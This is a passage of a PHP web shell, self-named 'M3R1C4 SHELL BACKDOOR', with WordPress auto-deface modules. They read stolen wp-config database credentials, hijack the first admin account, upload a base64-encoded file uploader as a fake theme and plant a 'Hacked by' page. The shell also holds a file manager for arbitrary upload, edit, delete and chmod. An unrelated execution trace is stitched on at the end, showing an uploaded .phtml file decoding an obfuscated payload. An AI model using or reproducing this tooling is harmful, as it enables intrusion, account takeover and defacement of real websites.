curl_init(\"\$target/wp-content/uploads/\$y/\$m/\$www\");\r\n\t\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_POSTFIELDS, array('file3'=>\"@\$namafile\"));\r\n\t\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_COOKIEFILE, \"cookie.txt\");\r\n\t \t\t \t\t curl_setopt(\$ch6, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t \t\t \t\t curl_setopt(\$ch6, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\t\$postResult = curl_exec(\$ch6);\r\n\t\t\t\t\t\t curl_close(\$ch6);\r\n\t\t\t\t\t\$as = \"\$target/k.php\";\r\n\t\t\t\t\t\$bs = anucurl(\$as);\r\n\t\t\t\t\tif(preg_match(\"#\$script#is\", \$bs)) {\r\n \t \techo \"[+] <font color='lime'>Berhasil...</font><br>\";\r\n \t \techo \"[+] <a href='\$as' target='_blank'>\$as</a><br><br>\"; \r\n \t } else {\r\n \t echo \"[-] <font color='red'>Gagal...</font><br>\";\r\n \t echo \"[!!] coba aja manual: <br>\";\r\n \t echo \"[+] <a href='\$target/wp-login.php' target='_blank'>\$target/wp-login.php</a><br>\";\r\n \t echo \"[+] username: <font color=lime>\$user</font><br>\";\r\n \t echo \"[+] password: <font color=lime>\$pass</font><br><br>\"; \r\n \t }\r\n \t\tmysql_close(\$conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center><h1>WordPress Auto Deface</h1>\r\n\t\t<form method='post'>\r\n\t\t<input type='text' name='link_config' size='50' height='10' value='\$dir'><br>\r\n\t\t<input type='text' name='script' height='10' size='50' placeholder='Hacked by ' required><br>\r\n\t\t<input type='submit' style='width: 100px;' name='auto_deface_wp' value='Submit'>\r\n\t\t</form>\r\n\t\t<br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>\r\n\t\t</center>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'auto_dwp2') {\r\n\tif(\$_POST['auto_deface_wp']) {\r\n\t\tfunction anucurl(\$sites) {\r\n \t\t\$ch = curl_init(\$sites);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n\t \t\t curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt(\$ch, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t \t\t curl_setopt(\$ch, CURLOPT_COOKIEFILE,'cookie.txt');\r\n\t \t\t curl_setopt(\$ch, CURLOPT_COOKIESESSION,true);\r\n\t\t\t\$data = curl_exec(\$ch);\r\n\t\t\t\t curl_close(\$ch);\r\n\t\t\treturn \$data;\r\n\t\t}\r\n\t\tfunction lohgin(\$cek, \$web, \$userr, \$pass, \$wp_submit) {\r\n \t\t\$post = array(\r\n \"log\" => \"\$userr\",\r\n \"pwd\" => \"\$pass\",\r\n \"rememberme\" => \"forever\",\r\n \"wp-submit\" => \"\$wp_submit\",\r\n \"redirect_to\" => \"\$web\",\r\n \"testcookie\" => \"1\",\r\n );\r\n\t\t\t\$ch = curl_init(\$cek);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_USERAGENT, \"Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\");\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \$post);\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEFILE,'cookie.txt');\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\$data = curl_exec(\$ch);\r\n\t\t\t\t curl_close(\$ch);\r\n\t\t\treturn \$data;\r\n\t\t}\r\n\t\t\$link = explode(\"\\r\\n\", \$_POST['link']);\r\n\t\t\$script = htmlspecialchars(\$_POST['script']);\r\n\t\t\$user = \"indoxploit\";\r\n\t\t\$pass = \"indoxploit\";\r\n\t\t\$passx = md5(\$pass);\r\n\t\tforeach(\$link as \$dir_config) {\r\n\t\t\t\$config = anucurl(\$dir_config);\r\n\t\t\t\$dbhost = ambilkata(\$config,\"DB_HOST', '\",\"'\");\r\n\t\t\t\$dbuser = ambilkata(\$config,\"DB_USER', '\",\"'\");\r\n\t\t\t\$dbpass = ambilkata(\$config,\"DB_PASSWORD', '\",\"'\");\r\n\t\t\t\$dbname = ambilkata(\$config,\"DB_NAME', '\",\"'\");\r\n\t\t\t\$dbprefix = ambilkata(\$config,\"table_prefix = '\",\"'\");\r\n\t\t\t\$prefix = \$dbprefix.\"users\";\r\n\t\t\t\$option = \$dbprefix.\"options\";\r\n\t\t\t\$conn = mysql_connect(\$dbhost,\$dbuser,\$dbpass);\r\n\t\t\t\$db = mysql_select_db(\$dbname);\r\n\t\t\t\$q = mysql_query(\"SELECT * FROM \$prefix ORDER BY id ASC\");\r\n\t\t\t\$result = mysql_fetch_array(\$q);\r\n\t\t\t\$id = \$result[ID];\r\n\t\t\t\$q2 = mysql_query(\"SELECT * FROM \$option ORDER BY option_id ASC\");\r\n\t\t\t\$result2 = mysql_fetch_array(\$q2);\r\n\t\t\t\$target = \$result2[option_value];\r\n\t\t\tif(\$target == '') {\t\t\t\t\t\r\n\t\t\t\techo \"[-] <font color=red>error, gabisa ambil nama domain nya</font><br>\";\r\n\t\t\t} else {\r\n\t\t\t\techo \"[+] \$target <br>\";\r\n\t\t\t}\r\n\t\t\t\$update = mysql_query(\"UPDATE \$prefix SET user_login='\$user',user_pass='\$passx' WHERE ID='\$id'\");\r\n\t\t\tif(!\$conn OR !\$db OR !\$update) {\r\n\t\t\t\techo \"[-] MySQL Error: <font color=red>\".mysql_error().\"</font><br><br>\";\r\n\t\t\t\tmysql_close(\$conn);\r\n\t\t\t} else {\r\n\t\t\t\t\$site = \"\$target/wp-login.php\";\r\n\t\t\t\t\$site2 = \"\$target/wp-admin/theme-install.php?upload\";\r\n\t\t\t\t\$b1 = anucurl(\$site2);\r\n\t\t\t\t\$wp_sub = ambilkata(\$b1, \"id=\\\"wp-submit\\\" class=\\\"button button-primary button-large\\\" value=\\\"\",\"\\\" />\");\r\n\t\t\t\t\$b = lohgin(\$site, \$site2, \$user, \$pass, \$wp_sub);\r\n\t\t\t\t\$anu2 = ambilkata(\$b,\"name=\\\"_wpnonce\\\" value=\\\"\",\"\\\" />\");\r\n\t\t\t\t\$upload3 = base64_decode(\"Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==\");\r\n\t\t\t\t\$www = \"m.php\";\r\n\t\t\t\t\$fp5 = fopen(\$www,\"w\");\r\n\t\t\t\tfputs(\$fp5,\$upload3);\r\n\t\t\t\t\$post2 = array(\r\n\t\t\t\t\t\t\"_wpnonce\" => \"\$anu2\",\r\n\t\t\t\t\t\t\"_wp_http_referer\" => \"/wp-admin/theme-install.php?upload\",\r\n\t\t\t\t\t\t\"themezip\" => \"@\$www\",\r\n\t\t\t\t\t\t\"install-theme-submit\" => \"Install Now\",\r\n\t\t\t\t\t\t);\r\n\t\t\t\t\$ch = curl_init(\"\$target/wp-admin/update.php?action=upload-theme\");\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_POSTFIELDS, \$post2);\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIEFILE,'cookie.txt');\r\n\t\t\t\t curl_setopt(\$ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t\t\$data3 = curl_exec(\$ch);\r\n\t\t\t\t\t curl_close(\$ch);\r\n\t\t\t\t\$y = date(\"Y\");\r\n\t\t\t\t\$m = date(\"m\");\r\n\t\t\t\t\$namafile = \"id.php\";\r\n\t\t\t\t\$fpi = fopen(\$namafile,\"w\");\r\n\t\t\t\tfputs(\$fpi,\$script);\r\n\t\t\t\t\$ch6 = curl_init(\"\$target/wp-content/uploads/\$y/\$m/\$www\");\r\n\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_POST, true);\r\n\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_POSTFIELDS, array('file3'=>\"@\$namafile\"));\r\n\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t curl_setopt(\$ch6, CURLOPT_COOKIEFILE, \"cookie.txt\");\r\n\t \t\t \t curl_setopt(\$ch6, CURLOPT_COOKIEJAR,'cookie.txt');\r\n\t \t\t \t curl_setopt(\$ch6, CURLOPT_COOKIESESSION,true);\r\n\t\t\t\t\$postResult = curl_exec(\$ch6);\r\n\t\t\t\t\t curl_close(\$ch6);\r\n\t\t\t\t\$as = \"\$target/k.php\";\r\n\t\t\t\t\$bs = anucurl(\$as);\r\n\t\t\t\tif(preg_match(\"#\$script#is\", \$bs)) {\r\n \techo \"[+] <font color='lime'>Berhasil...</font><br>\";\r\n \techo \"[+] <a href='\$as' target='_blank'>\$as</a><br><br>\"; \r\n } else {\r\n echo \"[-] <font color='red'>Gagal...</font><br>\";\r\n echo \"[!!] coba aja manual: <br>\";\r\n echo \"[+] <a href='\$target/wp-login.php' target='_blank'>\$target/wp-login.php</a><br>\";\r\n echo \"[+] username: <font color=lime>\$user</font><br>\";\r\n echo \"[+] password: <font color=lime>\$pass</font><br><br>\"; \r\n }\r\n \tmysql_close(\$conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo \"<center><h1>WordPress Auto Deface V.2</h1>\r\n\t\t<form method='post'>\r\n\t\tLink Config: <br>\r\n\t\t<textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>\r\n\t\t<input type='text' name='script' height='10' size='50' placeholder='Hacked by ' required><br>\r\n\t\t<input type='submit' style='width: 100px;' name='auto_deface_wp' value='Hajar!!'>\r\n\t\t</form></center>\";\r\n\t}\r\n}\r\necho '</font></center></td></tr><tr><td><center>';\r\nif(isset(\$_FILES['file'])){\r\nif(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){\r\necho '<font color=\"green\">File Upload</font><br />';\r\n}else{\r\necho '<font color=\"red\">Upload Failed !!</font><br />';\r\n}\r\n}\r\necho '</center><center><form enctype=\"multipart/form-data\" method=\"POST\"><font color=\"black\"><input style=\"background:silver;font-family: Comic Sans MS \" type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"Upload\" />\r\n</form></center>\r\n</td></tr>';\r\nif(isset(\$_GET['filesrc'])){\r\necho \"<tr><td><center>Current File : \";\r\necho \$_GET['filesrc'];\r\necho '</center></tr></td></table><br />';\r\necho(' <textarea style=\"width: 100%;height: 400px;\" readonly> '.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</textarea>');\r\n}\r\n//Empety\r\nelseif(isset(\$_GET['option']) && \$_GET['opt'] != 'delete'){\r\necho '</table><br /><center>'.\$_POST['path'].'<br /><br />';\r\n//Chmod\r\nif(\$_GET['opt'] == 'chmod'){\r\nif(isset(\$_POST['perm'])){\r\nif(chmod(\$_POST['path'],\$_POST['perm'])){\r\necho '<font color=\"green\">Change Permission Done </font><br />';\r\n}else{\r\necho '<font color=\"red\">Change Permission Error </font><br />';\r\n}\r\n}\r\n\r\n\$hell = \$_GET['path'];\r\n\$yeah = \$_GET['name'];\r\n\$patc = \"\$hell/\$yeah\";\r\n\r\necho '<form method=\"POST\">\r\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms(\$patc)), -4).'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\r\n<input type=\"submit\" value=\"Submit\" />\r\n</form>';\r\n}\r\n//\r\nelseif(\$_GET['opt'] == 'btw'){\r\n\t\$cwd = getcwd();\r\n\t echo '<form action=\"?option&path='.\$cwd.'&opt=delete&type=buat\" method=\"POST\">\r\nNew Name : <input name=\"name\" type=\"text\" size=\"20\" value=\"Folder\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$cwd.'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"delete\">\r\n<input type=\"submit\" value=\"Submit\" />\r\n</form>';\r\n}\r\n//Rename file\r\nelseif(\$_GET['opt'] == 'rename'){\r\nif(isset(\$_POST['newname'])){\r\nif(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){\r\necho '<font color=\"green\">Change Name Done </font><br />';\r\n}else{\r\necho '<font color=\"red\">Change Name Error </font><br />';\r\n}\r\n\$_POST['name'] = \$_POST['newname'];\r\n}\r\n\$hell = \$_GET['path'];\r\n\$yeah = \$_GET['name'];\r\n\$patc = \"\$hell/\$yeah\";\r\n\$new = \$_POST['newname'];\r\n\r\necho '<form method=\"POST\">\r\nNew Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.\$new.'\" />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$patc.'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\r\n<input type=\"submit\" value=\"Submit\" />\r\n</form>';\r\n}\r\n//File baru\r\nelseif(\$_GET['opt'] == 'baru'){\r\n\t\r\n\$hell = \$_GET['path'];\r\n\$yeah = \$_GET['name'];\r\n\$patc = \"\$hell/\$yeah\";\r\n\$new = \$_POST['newname'];\r\n\$azz = \$_POST['path'];\r\n\$newz = \"\$azz/\$new\";\r\n\r\n\r\nif(isset(\$_POST['src'])){\r\n\$fp = fopen(\$_POST['path'],'w');\r\nif(fwrite(\$fp,\$_POST['src'])){\r\necho '<font color=\"green\">Create File Done [ '.\$new.' ]</font><br />';\r\n}else{\r\necho '<font color=\"red\">Create File Error</font><br />';\r\n}\r\nfclose(\$fp);\r\n}\r\n\r\necho '<form method=\"POST\"> Name : <input name=\"ngaran1\" type=\"text\" size=\"20\" value=\"'.\$new.'\" /><input type=\"submit\" name=\"ngaran\" value=\"Create\"/></form><br> ';\r\n\r\n\$ho = \$_POST['ngaran1'];\r\n\r\nif(isset(\$_POST['ngaran'])){\r\necho '<form method=\"POST\">\r\n<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$patc)).'</textarea><br />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$hell.'/'.\$ho.'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n<input type=\"submit\" value=\"Submit\" />\r\n</form>';\r\n\t}\r\n\t}\r\n//Edited file\r\nelseif(\$_GET['opt'] == 'edit'){\r\nif(isset(\$_POST['src'])){\r\n\$fp = fopen(\$_POST['path'],'w');\r\nif(fwrite(\$fp,\$_POST['src'])){\r\necho '<font color=\"green\">Edit File Done </font><br />';\r\n}else{\r\necho '<font color=\"red\">Edit File Error </font><br />';\r\n}\r\nfclose(\$fp);\r\n}\r\n\$hell = \$_GET['path'];\r\n\$yeah = \$_GET['name'];\r\n\$patc = \"\$hell/\$yeah\";\r\necho '<form method=\"POST\">\r\n<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$patc)).'</textarea><br />\r\n<input type=\"hidden\" name=\"path\" value=\"'.\$patc.'\">\r\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\r\n<input type=\"submit\" value=\"Submit\" />\r\n</form>';\r\n}\r\necho '</center>';\r\n}else{\r\necho '</table><br /><center>';\r\n//Delete dir and file\r\nif(isset(\$_GET['option']) && \$_GET['opt'] == 'delete'){\r\n\t\r\n\$hell = \$_GET['path'];\r\n\$yeah = \$_GET['name'];\r\n\$patc = \"\$hell/\$yeah\";\r\n\r\n//Delete dir\r\nif(\$_GET['type'] == 'dir'){\r\n\r\nif(rmdir(\$patc)){\r\necho '<font color=\"green\">Delete File Done</font><br />';\r\n}else{\r\necho '<font color=\"red#\">Delete File Error </font><br />';\r\n}\r\n}\r\n//buat folder\r\nif(\$_GET['type'] == 'buat'){\r\n\$haaa = \$_POST['path'];\r\n\$heee = \$_POST['name'];\r\n\$hooo = \"\$haaa/\$heee\";\r\n\$new = \$haaa.'/'.htmlspecialchars(\$heee);\r\nif(!mkdir(\$new)){\r\necho '<font color=\"red\">Create Folder Error</font><br />';\r\n}else{\r\necho '<font color=\"green\">Create Folder Done </font><br />';\r\n}\r\n}\r\n//Delete file\r\nelseif(\$_GET['type'] == 'file'){\r\n\r\n\$hell = \$_GET['path'];\r\n\$yeah = \$_GET['name'];\r\n\$patc = \"\$hell/\$yeah\";\r\n\r\nif(unlink(\$patc)){\r\necho '<font color=\"green\">Delete File Done</font><br />';\r\n}else{\r\necho '<font color=\"red#\">Delete File Error </font><br />';\r\n}\r\n}\r\n}\r\necho '</center>';\r\n\$scandir = scandir(\$path);\r\n\$pa = getcwd();\r\necho ' <table width=\"100%\" class=\"table_home\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr>\r\n<th class=th_home style=\"background:silver;color:black;\"><center>Name</center></th>\r\n<th class=th_home style=\"background:silver;color:black;\" ><center>Size</center></th>\r\n<th class=th_home style=\"background:silver;color:black;\" ><center>Permission</center></th>\r\n<th class=th_home style=\"background:silver;color:black;\" ><center>Options</center></th>\r\n</tr> <tr>\r\n<td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href=\"?option&path='.\$pa.'&opt=baru&name=new.php\">New File</a> | <a href=\"?option&path='.\$pa.'&opt=btw&type=dir\">New Folder</a> </td></tr>\r\n';\r\n\r\nforeach(\$scandir as \$dir){\r\nif(!is_dir(\"\$path/\$dir\") || \$dir == '.' || \$dir == '..') continue;\r\necho \"\r\n<tr>\r\n<td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA\".\"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp\".\"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\\\"?path=\$path/\$dir\\\">\$dir</a></td>\r\n<td class=td_home ><center>DIR</center></td>\r\n<td class=td_home ><center>\";\r\nif(is_writable(\"\$path/\$dir\")) echo '<font color=\"green\">';\r\nelseif(!is_readable(\"\$path/\$dir\")) echo '<font color=\"red\">';\r\necho perms(\"\$path/\$dir\");\r\nif(is_writable(\"\$path/\$dir\") || !is_readable(\"\$path/\$dir\")) echo '</font>';\r\n\r\necho \"</center></td>\r\n<td class=td_home ><center>\r\n<a href=\\\"?option&path=\$path&opt=rename&type=dir&name=\$dir\\\">Rename</a> <a href=\\\"?option&path=\$path&opt=delete&type=dir&name=\$dir\\\">Delete</a> <a href=\\\"?option&path=\$path&opt=chmod&type=dir&name=\$dir\\\">Chmod</a>\r\n\r\n</center></td>\r\n</tr>\";\r\n}\r\necho '<br>';\r\nforeach(\$scandir as \$file){\r\nif(!is_file(\"\$path/\$file\")) continue;\r\n\$size = filesize(\"\$path/\$file\")/1024;\r\n\$size = round(\$size,3);\r\nif(\$size >= 1024){\r\n\$size = round(\$size/1024,2).' MB';\r\n}else{\r\n\$size = \$size.' KB';\r\n}\r\n\r\necho \"<tr>\r\n<td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\\\"?filesrc=\$path/\$file&path=\$path\\\">\$file</a></td>\r\n<td class=td_home><center>\".\$size.\"</center></td>\r\n<td class=td_home><center>\";\r\nif(is_writable(\"\$path/\$file\")) echo '<font color=\"green\">';\r\nelseif(!is_readable(\"\$path/\$file\")) echo '<font color=\"red\">';\r\necho perms(\"\$path/\$file\");\r\nif(is_writable(\"\$path/\$file\") || !is_readable(\"\$path/\$file\")) echo '</font>';\r\necho \"</center></td>\r\n<td class=td_home><center>\r\n<a href=\\\"?option&path=\$path&opt=edit&type=file&name=\$file\\\">Edit</a> <a href=\\\"?option&path=\$path&opt=rename&type=file&name=\$file&path=\$path\\\">Rename</a> <a href=\\\"?option&path=\$path&opt=delete&type=file&name=\$file\\\">Delete</a> <a href=\\\"?option&path=\$path&opt=chmod&type=file&name=\$file\\\">Chmod</a>\r\n</center></td>\r\n</tr>\";\r\n}\r\necho '</table>\r\n</div>';\r\n}\r\necho '<br><center>Copyright © Trenggalek Cyber Army</b></body>\r\n</html>';\r\nfunction perms(\$file){\r\n\$perms = fileperms(\$file);\r\n\r\nif ((\$perms & 0xC000) == 0xC000) {\r\n// Socket\r\n\$info = 's';\r\n} elseif ((\$perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n\$info = 'l';\r\n} elseif ((\$perms & 0x8000) == 0x8000) {\r\n// Regular\r\n\$info = '-';\r\n} elseif ((\$perms & 0x6000) == 0x6000) {\r\n// Block special\r\n\$info = 'b';\r\n} elseif ((\$perms & 0x4000) == 0x4000) {\r\n// Directory\r\n\$info = 'd';\r\n} elseif ((\$perms & 0x2000) == 0x2000) {\r\n// Character special\r\n\$info = 'c';\r\n} elseif ((\$perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n\$info = 'p';\r\n} else {\r\n// Unknown\r\n\$info = 'u';\r\n}\r\n\r\n// Owner\r\n\$info .= ((\$perms & 0x0100) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0080) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0040) ?\r\n((\$perms & 0x0800) ? 's' : 'x' ) :\r\n((\$perms & 0x0800) ? 'S' : '-'));\r\n\r\n// Group\r\n\$info .= ((\$perms & 0x0020) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0010) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0008) ?\r\n((\$perms & 0x0400) ? 's' : 'x' ) :\r\n((\$perms & 0x0400) ? 'S' : '-'));\r\n\r\n// World\r\n\$info .= ((\$perms & 0x0004) ? 'r' : '-');\r\n\$info .= ((\$perms & 0x0002) ? 'w' : '-');\r\n\$info .= ((\$perms & 0x0001) ?\r\n((\$perms & 0x0200) ? 't' : 'x' ) :\r\n((\$perms & 0x0200) ? 'T' : '-'));\r\n\r\nreturn \$info;\r\n}\r\n//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!");
?>
</html>Execution traces
data/traces/97bc617b18b7d00a523a90d485d08b76_trace-1676237713.977.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:35:39.874839]
1 0 1 0.000145 393528
1 3 0 0.000257 423008 {main} 1 /var/www/html/uploads/img_x.phtml 0 0
1 A /var/www/html/uploads/img_x.phtml 69 $aDriv4 = '7X35W+LI1vDPPc8z/1A119voqxJA3Je5oCyisioC3f34JDEJIoYkkFWYmfdi/0EtTAkItjP33vd4dCFWSJ06SGjqrLVjXGonn6pyQ+Gu0emgd6XWrudlbGeZVyTRr79jXN2QrTGPqgOUFZ5HG3qjb62CFFCd4tRbyTBeFGeETbwuXIm2YCnoCyrJiqp46tjIHOBZesMQRFq1p5BHkwRObPn86y/4H9lDHhR4dzzY1tRF1pMbx7/+b1WSID1VhihVisWP6cdff7FT63DIPUjHlvbw2BMUUH4Yi9r6xsbvv/4yEiRQ1cz1tYfzXKGIRxmtWozB6dkaINwzYw6a8hV//o5BkaxVlijbqnka8jrLBdX8Vv41NEZA8ZPPuqApA9FApjK1z3795cT9NUcd/yqWbxt0eHiodwwHdXrthKNfIIkjbOIE89/wh99RRgQsJtDY05j6KPb4Vjr1r/FHteyEJllwkGZ6qMq2NTmNnRuyyqs8KpiGeiNdSEd+jHe9CfpZ'
2 4 0 0.000319 423120 base64_decode 0 /var/www/html/uploads/img_x.phtml 70 1 '7X35W+LI1vDPPc8z/1A119voqxJA3Je5oCyisioC3f34JDEJIoYkkFWYmfdi/0EtTAkItjP33vd4dCFWSJ06SGjqrLVjXGonn6pyQ+Gu0emgd6XWrudlbGeZVyTRr79jXN2QrTGPqgOUFZ5HG3qjb62CFFCd4tRbyTBeFGeETbwuXIm2YCnoCyrJiqp46tjIHOBZesMQRFq1p5BHkwRObPn86y/4H9lDHhR4dzzY1tRF1pMbx7/+b1WSID1VhihVisWP6cdff7FT63DIPUjHlvbw2BMUUH4Yi9r6xsbvv/4yEiRQ1cz1tYfzXKGIRxmtWozB6dkaINwzYw6a8hV//o5BkaxVlijbqnka8jrLBdX8Vv41NEZA8ZPPuqApA9FApjK1z3795cT9NUcd/yqWbxt0eHiodwwHdXrthKNfIIkjbOIE89/wh99RRgQsJtDY05j6KPb4Vjr1r/FHteyEJllwkGZ6qMq2NTmNnRuyyqs8KpiGeiNdSEd+jHe9CfpZ'
2 4 1 0.000403 443632
2 4 R '�}�[�����=�3�P5���\022@ܗ��,��*\002��$1\t"�$�U���b�A-L\t\b�3��xt!VH�:Hhꬵc\\j\'��rC���w�֮�elg�W$ѯ�c\\ݐ�1��\003�\025�G\033z�o��\024P���[�0^\024g�M�.\\��`)�\v*Ɋ�x���\034�Yz�\020DZ���G�\004Nl���/�\037�C\036\024xw<���E֓\033ǿ�oU� =U�(U�ŏ��_�S�p�=Hǖ���\023\024P~\030�����2\022$P�����\\��G\031�Z����\032 �3c\016��\025��A��U�(۪y\032�:�\005�V�54F@�Ϻ�)\003�@�2��~���5G\035�*�o\033txx�w\f\auz턣_ �#l�\004����QF\004,&��Ә�(��V:���G��&Yp�fz�ʶ59��\033�ʫ<*��z#]HG~�w�\t�Y���G��!����<Cѵ`�`\bo���'
